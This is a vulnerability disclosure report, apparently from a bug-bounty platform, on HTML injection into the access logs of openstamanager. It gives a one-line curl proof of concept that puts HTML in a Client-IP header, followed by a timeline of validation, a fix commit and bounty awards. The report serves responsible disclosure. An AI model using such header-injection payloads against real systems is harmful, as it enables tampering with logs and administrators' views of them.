Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) in devcode-it/openstamanager

Valid

Reported on

Aug 14th 2021

✍️ Description

A user without access to the software can inject a portion of HTML code in access logs.

🕵️‍♂️ Proof of Concept

Simulate login with a crafter Client-IP header like this:

curl -H 'Client-IP: <h1>INJECT</h1>' -d 'username=<your-usename>&password=<your-password>&op=login' 'http://localhost/<your-path>/?op=login'

The result is: screen

💥 Impact

This vulnerability can inject HTML code. Fortunately the field for ip address is only 15 characters, too small to inject javascript code. 📍 Location functions.php#L188 📍 Location functions.php#L188

Occurrences

functions.php L188

FabioL modified the report

2 years ago

FabioL modified the report

2 years ago

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 2 years ago

A devcode-it/openstamanager maintainer validated this vulnerability 2 years ago

FabioL has been awarded the disclosure bounty

The fix bounty is now up for grabs

FabioL submitted a

patch

2 years ago

A devcode-it/openstamanager maintainer marked this as fixed with commit c965b3 2 years ago

FabioL has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

FabioL modified the report

2 years ago

FabioL modified the report

2 years ago

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 2 years ago

A devcode-it/openstamanager maintainer validated this vulnerability 2 years ago

FabioL has been awarded the disclosure bounty

The fix bounty is now up for grabs

FabioL submitted a

patch

2 years ago

A devcode-it/openstamanager maintainer marked this as fixed with commit c965b3 2 years ago

FabioL has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation